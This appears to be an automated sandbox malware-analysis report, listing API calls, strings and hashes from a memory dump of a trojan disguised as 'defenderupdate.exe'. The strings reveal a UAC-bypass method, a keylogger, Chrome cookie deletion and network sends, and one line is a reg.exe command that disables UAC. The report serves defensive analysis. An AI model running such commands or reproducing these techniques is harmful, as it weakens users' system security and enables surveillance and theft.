                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                • String ID: C:\Users\user\AppData\Roaming\defenderupdate.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                • API String ID: 3851391207-3821058442
                                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                Strings
                                                                                                • UserProfile, xrefs: 0040B2B4
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (CG$C:\Users\user\AppData\Roaming\defenderupdate.exe$BG
                                                                                                • API String ID: 0-223189810
                                                                                                • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 00439789
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                • __allrem.LIBCMT ref: 004397BC
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                • __allrem.LIBCMT ref: 004397F1
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                • Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                • String ID: a/p$am/pm
                                                                                                • API String ID: 3509577899-3206640213
                                                                                                • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]$DG
                                                                                                • API String ID: 3554306468-1089238109
                                                                                                • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                • API String ID: 1497725170-248792730
                                                                                                • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                APIs
                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                Strings
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3525466593-0
                                                                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 4269425633-0
                                                                                                • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                • _free.LIBCMT ref: 0044E1A0
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044F7B5
                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 0044F7C7
                                                                                                • _free.LIBCMT ref: 0044F7D9
                                                                                                • _free.LIBCMT ref: 0044F7EB
                                                                                                • _free.LIBCMT ref: 0044F7FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443305
                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 00443317
                                                                                                • _free.LIBCMT ref: 0044332A
                                                                                                • _free.LIBCMT ref: 0044333B
                                                                                                • _free.LIBCMT ref: 0044334C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                APIs
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                • String ID: (FG
                                                                                                • API String ID: 3142014140-2273637114
                                                                                                • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                APIs
                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                • String ID: XCG$`AG$>G
                                                                                                • API String ID: 2334542088-2372832151
                                                                                                • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\defenderupdate.exe,00000104), ref: 00442714
                                                                                                • _free.LIBCMT ref: 004427DF
                                                                                                • _free.LIBCMT ref: 004427E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
